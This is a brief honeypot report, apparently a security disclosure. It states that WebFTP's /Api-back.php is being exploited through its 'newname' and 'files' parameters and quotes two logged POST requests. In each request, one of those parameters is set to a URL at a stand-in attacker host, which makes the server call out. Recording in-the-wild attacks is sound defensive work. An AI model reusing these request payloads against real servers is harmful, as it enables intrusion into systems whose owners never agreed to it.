A honeypot at a client site caught these being exploited in the wild on 2022-08-09. The script is found in WebFTP, in /Api-back.php. The ‘newname’ and ‘files’ parameters are vulnerable.
REDACTED - - [20/Sep/2022:16:41:09 -0400] "POST /Api-back.php?newname=https%3A%2F%2F53678222-4159-46d0-b4b9-5067142a33c3.attacker.host%2Fthis%2Fis%3Fa%3Dpath HTTP/1.1" 404 741 "scalaj-http/2.4.2"
REDACTED - - [20/Sep/2022:19:16:11 -0400] "POST /Api-back.php?files=https%3A%2F%2F303841cc-6c1b-4c99-a6f5-5f1f73f3ae66.attacker.host%2Fthis%2Fis%3Fa%3Dpath HTTP/1.1" 404 734 "scalaj-http/2.4.2"